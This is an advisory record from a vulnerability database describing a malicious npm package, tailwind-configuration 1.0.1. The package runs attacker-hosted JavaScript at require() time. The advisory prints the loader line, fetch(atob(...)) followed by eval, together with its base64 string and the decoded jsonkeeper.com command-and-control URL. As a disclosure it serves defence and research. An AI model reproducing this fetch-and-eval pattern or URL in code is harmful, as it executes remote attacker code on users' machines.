VDB
GCVE-110-OSM-2026-1382
GCVE-110-OSM-2026-1382
Advisory PublishedCVSS 9.6/10
Executes attacker-controlled JavaScript from https://www.jsonkeeper.com/b/Y12K7 on every require() via fetch(atob(...))+eval pattern embedded in index.js. The 7-line package has no legitimate functionality beyond the payload stub.
index.js top level calls fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9ZMTJLNw==")) which decodes to https://www.jsonkeeper.com/b/Y12K7, awaits JSON response, and evals response.content in module scope. No install hooks — fires at require() time. Identical C2 URL shared with tailwind-scroller@1.0.2.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | tailwind-configuration | 1.0.1 (affected) | — |
Browse GCVE Records
73,442 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.